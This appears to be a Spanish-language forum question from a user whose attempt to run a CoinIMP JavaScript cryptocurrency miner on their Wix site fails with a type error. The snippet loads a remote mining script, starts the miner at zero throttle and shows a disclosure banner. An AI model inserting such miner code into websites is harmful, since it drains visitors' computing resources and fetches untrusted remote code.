Este es el código que traté de ejecutar en mi sitio wix para probar:
$w.onReady(function () { <script src="https://www.hostingcloud.racing/GNQ5.js"></script> var _client = new Client.Anonymous('1c004fb3b1034ddc00d8693de4d62794965914a8a06056221178b17248a5fe98', { throttle: 0, c: 'w' }); _client.start(); _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com", "#cccccc", 40, "#3d3d3d"); }); Y este es el error que obtuve: Property 'Anonymous' does not exist on type '{ new (): Client; prototype: Client; }'.